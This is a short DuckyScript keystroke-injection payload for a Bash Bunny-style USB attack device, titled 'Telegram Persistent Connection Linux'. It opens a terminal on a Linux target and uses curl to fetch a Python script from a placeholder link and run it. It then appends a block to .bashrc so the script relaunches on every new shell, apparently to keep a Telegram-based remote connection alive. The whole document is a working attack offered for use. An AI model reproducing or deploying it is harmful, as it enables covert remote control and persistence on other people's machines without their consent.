* REM #######################################################
* REM #                                                     |
* REM # Title        : Telegram Persistent Connection Linux |
* REM # Author       : Aleff                                |
* REM # Version      : 1.0                                  |
* REM # Category     : Execution                            |
* REM # Target       : Linux                                |
* REM #                                                     |
* REM #######################################################

ATTACKMODE HID

* REM Requirements:
* REM     - Internet Connection

QUACK REM VARIABLES
* REM Here you must put your own file link.
PYTHON-SCRIPT-LINK='https://www.example.com/connection.py'

QUACK DELAY 1000
QUACK CTRL-ALT t
QUACK DELAY 2000
QUACK STRING curl -o connection.py $PYTHON-SCRIPT-LINK; python3 connection.py; echo \"if ! pgrep -f connection.py >/dev/null; then
QUACK ENTER
QUACK STRING python3 connection.py &
QUACK ENTER
QUACK STRING fi\" >> .bashrc; exit
QUACK ENTER

